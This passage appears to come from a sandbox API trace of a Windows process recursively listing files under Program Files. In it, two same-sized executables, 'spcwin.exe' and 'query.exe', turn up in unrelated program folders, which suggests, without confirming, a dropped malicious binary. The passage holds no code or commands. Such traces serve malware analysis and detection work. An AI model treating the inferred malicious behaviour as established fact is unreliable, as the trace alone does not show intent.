dwReserved1=0x0, cFileName="msolap100.dll", cAlternateFileName="MSOLAP~1.DLL")) returned 1 [0058.231] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb46ad400, ftCreationTime.dwHighDateTime=0x1c8e1fb, ftLastAccessTime.dwLowDateTime=0x516f5b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb46ad400, ftLastWriteTime.dwHighDateTime=0x1c8e1fb, nFileSizeHigh=0x0, nFileSizeLow=0x4dc18, dwReserved0=0x0, dwReserved1=0x0, cFileName="msolui100.dll", cAlternateFileName="MSOLUI~1.DLL")) returned 1 [0058.231] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Resources", cAlternateFileName="RESOUR~1")) returned 1 [0058.231] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\*.*", lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6978f0 [0058.232] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.232] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0058.232] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x697930 [0058.233] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.233] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd9f68100, ftCreationTime.dwHighDateTime=0x1c9b09b, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xd9f68100, ftLastWriteTime.dwHighDateTime=0x1c9b09b, nFileSizeHigh=0x0, nFileSizeLow=0xa2b58, dwReserved0=0x0, dwReserved1=0x0, cFileName="msmdsrv.rll", cAlternateFileName="")) returned 1 [0058.233] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2512f000, ftCreationTime.dwHighDateTime=0x1c8e1fe, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x2512f000, ftLastWriteTime.dwHighDateTime=0x1c8e1fe, nFileSizeHigh=0x0, nFileSizeLow=0x3a18, dwReserved0=0x0, dwReserved1=0x0, cFileName="msolui100.rll", cAlternateFileName="MSOLUI~1.RLL")) returned 1 [0058.233] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2512f000, ftCreationTime.dwHighDateTime=0x1c8e1fe, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x2512f000, ftLastWriteTime.dwHighDateTime=0x1c8e1fe, nFileSizeHigh=0x0, nFileSizeLow=0x3a18, dwReserved0=0x0, dwReserved1=0x0, cFileName="msolui100.rll", cAlternateFileName="MSOLUI~1.RLL")) returned 0 [0058.233] FindClose (in: hFindFile=0x697930 | out: hFindFile=0x697930) returned 1 [0058.233] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 0 [0058.233] FindClose (in: hFindFile=0x6978f0 | out: hFindFile=0x6978f0) returned 1 [0058.234] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Resources", cAlternateFileName="RESOUR~1")) returned 0 [0058.234] FindClose (in: hFindFile=0x69b288 | out: hFindFile=0x69b288) returned 1 [0058.234] FindNextFileW (in: hFindFile=0x6999f8, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f1ce1d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5f1ce1d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10", cAlternateFileName="")) returned 0 [0058.234] FindClose (in: hFindFile=0x6999f8 | out: hFindFile=0x6999f8) returned 1 [0058.234] FindNextFileW (in: hFindFile=0x6989b0, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84d14b30, ftCreationTime.dwHighDateTime=0x1d5a2a5, ftLastAccessTime.dwLowDateTime=0x4f7f7180, ftLastAccessTime.dwHighDateTime=0x1d5b1ca, ftLastWriteTime.dwLowDateTime=0x4f7f7180, ftLastWriteTime.dwHighDateTime=0x1d5b1ca, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="spcwin.exe", cAlternateFileName="")) returned 1 [0058.234] FindNextFileW (in: hFindFile=0x6989b0, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84d14b30, ftCreationTime.dwHighDateTime=0x1d5a2a5, ftLastAccessTime.dwLowDateTime=0x4f7f7180, ftLastAccessTime.dwHighDateTime=0x1d5b1ca, ftLastWriteTime.dwLowDateTime=0x4f7f7180, ftLastWriteTime.dwHighDateTime=0x1d5b1ca, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="spcwin.exe", cAlternateFileName="")) returned 0 [0058.234] FindClose (in: hFindFile=0x6989b0 | out: hFindFile=0x6989b0) returned 1 [0058.234] FindNextFileW (in: hFindFile=0x6946c8, lpFindFileData=0x18f604 | out: lpFindFileData=0x18f604*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xde573fa0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xde573fa0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Office", cAlternateFileName="MICROS~1")) returned 1 [0058.234] FindNextFileW (in: hFindFile=0x6946c8, lpFindFileData=0x18f604 | out: lpFindFileData=0x18f604*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdae682e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdae682e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft SQL Server Compact Edition", cAlternateFileName="MICROS~3")) returned 1 [0058.234] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\*.*", lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdae682e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdae682e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69b288 [0058.235] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdae682e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdae682e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.235] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75d59530, ftCreationTime.dwHighDateTime=0x1d5ca25, ftLastAccessTime.dwLowDateTime=0x57cc2cf0, ftLastAccessTime.dwHighDateTime=0x1d5b34d, ftLastWriteTime.dwLowDateTime=0x57cc2cf0, ftLastWriteTime.dwHighDateTime=0x1d5b34d, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="query.exe", cAlternateFileName="")) returned 1 [0058.235] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 1 [0058.235] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\*.*", lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6978f0 [0058.265] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.265] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0058.265] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\Desktop\\*.*", lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x697930 [0058.266] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.266] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e54b70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e54b70, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0058.266] FindClose (in: hFindFile=0x697930 | out: hFindFile=0x697930) returned 1 [0058.266] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5ab6f770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x8b840, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceca35.dll", cAlternateFileName="SQLCEC~1.DLL")) returned 1 [0058.266] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x1d040, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlcecompact35.dll", cAlternateFileName="SQLCEC~2.DLL")) returned 1 [0058.266] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5ab6f770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x24440, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceer35EN.dll", cAlternateFileName="SQLCEE~1.DLL")) returned 1 [0058.266] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5ab958d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x15a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceme35.dll", cAlternateFileName="SQLCEM~1.DLL")) returned 1 [0058.266] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x3fa40, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceoledb35.dll", cAlternateFileName="SQLCEO~1.DLL")) returned 1 [0058.266] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeb18300, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x6d3caa70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdeb18300, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x114e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceqp35.dll", cAlternateFileName="SQLCEQ~1.DLL")) returned 1 [0058.266] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeb18300, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5abbba30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdeb18300, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x9d640, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlcese35.dll", cAlternateFileName="SQLCES~1.DLL")) returned 1 [0058.266] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeb18300, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5abbba30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdeb18300, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x9d640, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlcese35.dll", cAlternateFileName="SQLCES~1.DLL")) returned 0 [0058.267] FindClose (in: hFindFile=0x6978f0 | out: hFindFile=0x6978f0) returned 1 [0058.267] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 0 [0058.267] FindClose (in: hFindFile=0x69b288 | out: hFindFile=0x69b288) returned 1 [0058.267] FindNextFileW (in: hFindFile=0x6946c8, lpFindFileData=0x18f604 | out: lpFindFileData=0x18f604*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Sync Framework", cAlternateFileName="MICROS~4")) returned 1 [0058.267] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Sync Framework\\*.*", lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69b288 [0058.267] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.267] FindNextFileW (in: hFindFile=0x69b288, lpFindFileData=0x18f314 | out: lpFindFileData=0x18f314*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v1.0", cAlternateFileName="")) returned 1 [0058.267] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\*.*", lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6978f0 [0058.268] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.268] FindNextFileW (in: hFindFile=0x6978f0, lpFindFileData=0x18f024 | out: lpFindFileData=0x18f024*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6626d2b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documentation", cAlternateFileName="DOCUME~1")) returned 1 [0058.268] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Sync Framework\\v1.0\\Documentation\\*.*", lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6626d2b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x697930 [0058.269] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6626d2b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6626d2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6626d2b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.269] FindNextFileW (in: hFindFile=0x697930, lpFindFileData=0x18ed34 | out: lpFindFileData=0x18ed34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6626d2b0, ftCreationTime.dwHighDateTime=0x1d301bf, 